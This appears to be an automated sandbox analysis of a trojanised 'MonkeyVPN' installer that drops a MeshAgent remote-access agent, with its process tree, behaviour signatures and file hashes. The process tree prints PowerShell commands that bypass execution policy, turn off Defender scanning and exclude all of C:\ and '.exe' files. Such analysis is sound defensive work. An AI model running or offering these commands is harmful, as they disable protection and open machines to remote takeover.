Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    24-09-2024 07:04

General

  • Target

    MonkeyVPN1.1.2.exe

  • Size

    43.2MB

  • MD5

    f3696254e6992deccbff25ab0af2ebc8

  • SHA1

    54ca8798c4e4eb8a455769ab706cc3de7fa1917d

  • SHA256

    ce92f52a6bc1f39cb592766cbf17e5bed63fa59eda5c88a961517ba3da5b49d3

  • SHA512

    fc58762f3436e0c32d57ffdba6f3fc3eeb176a52eed93c41b3c867fd24e5eb431bb46a2e89c375598ae37c83ec726dc74b1a61ee18e5c583e339ad4a3de1e8e7

  • SSDEEP

    786432:W+ZLhn5jG92pLhIvTIUBEiigLdfKRo8lS1h2a35VdZn33DmzBt/vWJZlZj1SXgfK:WULhn5jGWVIbIUBUsxMlmV3nHnnD6TX5

Malware Config

Signatures

  • Detects MeshAgent payload 1 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 64 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 53 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\MonkeyVPN1.1.2.exe
    "C:\Users\Admin\AppData\Local\Temp\MonkeyVPN1.1.2.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:4728
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4472
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2912
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2100
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4380
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell "Add-MpPreference -ExclusionExtension '.exe' -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            PID:3512
          • C:\Users\Admin\AppData\Local\naver\naver.exe
            C:\Users\Admin\AppData\Local\naver\naver.exe -install
            5⤵
            • Sets service image path in registry
            • Executes dropped EXE
            PID:1996
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1044
      • C:\Users\Admin\AppData\Local\Temp\start.exe
        start.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3452
        • C:\Windows\SysWOW64\msiexec.exe
          msiexec.exe /i C:\Users\Admin\AppData\Local\Temp\MSI92F9.tmp
          4⤵
          • Enumerates connected drives
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:3340
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4712
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 861EEC0975AD77256AB6AFD564D17DFA C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:384
  • C:\Users\Admin\AppData\Local\naver\naver.exe
    "C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Modifies data under HKEY_USERS
    • Suspicious use of WriteProcessMemory
    PID:2292
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      PID:3812
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      PID:3668
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      PID:60
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      PID:1852
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      PID:4412
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      PID:2240
  • C:\Users\Admin\AppData\Local\naver\naver.exe
    "C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Modifies data under HKEY_USERS
    • Suspicious use of WriteProcessMemory
    PID:1700
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      PID:4332
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      PID:808
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      PID:1272
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      PID:3440
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      PID:208
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -noprofile -nologo -command -
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      PID:3756

Network

MITRE ATT&CK Enterprise v15

Downloads

                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                          Filesize

                          2KB

                          MD5

                          2f57fde6b33e89a63cf0dfdd6e60a351

                          SHA1

                          445bf1b07223a04f8a159581a3d37d630273010f

                          SHA256

                          3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                          SHA512

                          42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                          Filesize

                          53KB

                          MD5

                          a26df49623eff12a70a93f649776dab7

                          SHA1

                          efb53bd0df3ac34bd119adf8788127ad57e53803

                          SHA256

                          4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

                          SHA512

                          e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Filesize

                          1KB

                          MD5

                          11a4be5f9e5fdf4a714849b63ea2f086

                          SHA1

                          97ec6e61a365b04d572e100699c37ebbbda9c5d2

                          SHA256

                          7854010dfa1f008ac8f26493dfbbc378bafb67e4e3dc9d1a13ce408668f2fac4

                          SHA512

                          807ea1222e227985901057c3337d80b587174b3e8b9e50d4d8b4bd67ce500e3e891057f318b74c401196612dcb969862bb6edda2f938f573a54ac53ff88efea8

                        • C:\Users\Admin\AppData\Local\Temp\MSI92F9.tmp

                          Filesize

                          30.3MB

                          MD5

                          71141c5e6c5aa8e363f64c6014588d9b

                          SHA1

                          fd759473d536ce9423d3e9efb6f0b118f149e0d4

                          SHA256

                          26188d91a417a4c4c8c9226015ad6b5f4ddb86ca3bac9031206efc9e45acfc8e

                          SHA512

                          187314ecf0395d2245d37b0b3f2361896dcf6f6fa0d30b0c724c8a73a9d45c1798357654d863c8b304f775bfd32f0c30e0735a7abb5edbe0aeb4166046472b41

                        • C:\Users\Admin\AppData\Local\Temp\MSI9E15.tmp

                          Filesize

                          298KB

                          MD5

                          684f2d21637cb5835172edad55b6a8d9

                          SHA1

                          5eac3b8d0733aa11543248b769d7c30d2c53fcdb

                          SHA256

                          da1fe86141c446921021bb26b6fe2bd2d1bb51e3e614f46f8103ffad8042f2c0

                          SHA512

                          7b626c2839ac7df4dd764d52290da80f40f7c02cb70c8668a33ad166b0bcb0c1d4114d08a8754e0ae9c0210129ae7e885a90df714ca79bd946fbd8009848538c

                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yidyafq4.5ju.ps1

                          Filesize

                          60B

                          MD5

                          d17fe0a3f47be24a6453e9ef58c94641

                          SHA1

                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                          SHA256

                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                          SHA512

                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                        • C:\Users\Admin\AppData\Local\Temp\start.exe

                          Filesize

                          30.4MB

                          MD5

                          5b073f98aab6e4f779aadd9f9d4b75a2

                          SHA1

                          c81700159450dc0ac7c40f7e73203a963fd83e9a

                          SHA256

                          0b04da17c658f67b1b74afb9831e09664dc976a401350a9b8e1f76c1e3c5caca

                          SHA512

                          84c4be46cbdbc40e5a90e2dce2a1c58ecf6816cc47cc9aa4105730deefb8c691ce406aa35b90152baffcf93564dec4ce747995ee0ba2573f6fa480f3e143780d

                        • C:\Users\Admin\AppData\Local\naver\naver.db

                          Filesize

                          131KB

                          MD5

                          1abe9befaa0a622b030d0821d279427f

                          SHA1

                          c62a53bc4f540873c503ddd74eae868677494777

                          SHA256

                          dc83d02eb8f7f6e81777a109a9f9765b468369c482d336be07a866f6e3d8c4d4

                          SHA512

                          d4c8379fe3617395a3ffaf8ceb53a56d4e30e2ebeed0aa0c0022f89bead065c705c30f22ed0f83acea9f84dbe226e99471a34fef0e91a30de7a4b0439447dfc8

                        • C:\Users\Admin\AppData\Local\naver\naver.exe

                          Filesize

                          5.3MB

                          MD5

                          ebf9e3ebfc0b3f99e971a1be4f0072c6

                          SHA1

                          ffd1d6dccf254d70605b1624980d8f01d8783d6f

                          SHA256

                          d819ee6d4691be3c4729edccc32cd763f506860892459c275045282127552414

                          SHA512

                          c1d31f2d70ae4d5733914d94a0ad438f47ffa3364bd06a57291f0a9772e70d30a7b09094dc50c1391f4890249c11d6256dcb38d83115632cf53eb334e8702407

                        • C:\Users\Admin\AppData\Local\naver\naver.msh

                          Filesize

                          22KB

                          MD5

                          2dd515ea546a81398d94dd15e3b4d55c

                          SHA1

                          eb0b0fca721a296906166b7e972559b87353b726

                          SHA256

                          becc832e6028a35aa50af95a2d80bcccbf0fcc8e9d1a333cd0661a77bdf089b2

                          SHA512

                          439b241e56783b766c70aaacfc2efe59b1136cc8e0e5377e606697d0b3048be6787a0a2ce2a549a294633dda8a39f02f2f457d999ce2ec22f74ef07daf912dfb

                        • C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\F1F1B0B6369A84B2B68552FDC57ABDEB60805A02

                          Filesize

                          1KB

                          MD5

                          fea22cdc65b314eaf6445fbf97e961f9

                          SHA1

                          bfd8ec802a7e36b4fe98666313f0324417523ced

                          SHA256

                          3d9ee364e8a4bdc4ceff4b2e10a570c478f5b7b75fc39508bdad905086a00850

                          SHA512

                          f6eefb64873c90fc6e81603aa60ebf00a468c8fa52c18fb750236afc9ec889008e4194549f976dce555fb0c73e7fd15cd65654cde703998b34db6144697065ed

                        • memory/2912-52-0x00007FFF6DB60000-0x00007FFF6E621000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2912-24-0x00007FFF6DB60000-0x00007FFF6E621000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2912-30-0x0000020733F00000-0x0000020733F76000-memory.dmp

                          Filesize

                          472KB

                        • memory/2912-29-0x00007FFF6DB60000-0x00007FFF6E621000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2912-50-0x00007FFF6DB60000-0x00007FFF6E621000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2912-28-0x0000020733E30000-0x0000020733E74000-memory.dmp

                          Filesize

                          272KB

                        • memory/2912-59-0x00007FFF6DB60000-0x00007FFF6E621000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/2912-27-0x00007FFF6DB60000-0x00007FFF6E621000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/4472-33-0x00007FFF6DB60000-0x00007FFF6E621000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/4472-4-0x00007FFF6DB63000-0x00007FFF6DB65000-memory.dmp

                          Filesize

                          8KB

                        • memory/4472-23-0x0000029AEFFB0000-0x0000029AEFFD2000-memory.dmp

                          Filesize

                          136KB

                        • memory/4472-26-0x00007FFF6DB60000-0x00007FFF6E621000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/4472-25-0x00007FFF6DB60000-0x00007FFF6E621000-memory.dmp

                          Filesize

                          10.8MB

                        • memory/4728-49-0x0000000000160000-0x00000000032FF000-memory.dmp

                          Filesize

                          49.6MB

                        • memory/4728-0-0x0000000000160000-0x00000000032FF000-memory.dmp

                          Filesize

                          49.6MB

                        • memory/4728-51-0x0000000000160000-0x00000000032FF000-memory.dmp

                          Filesize

                          49.6MB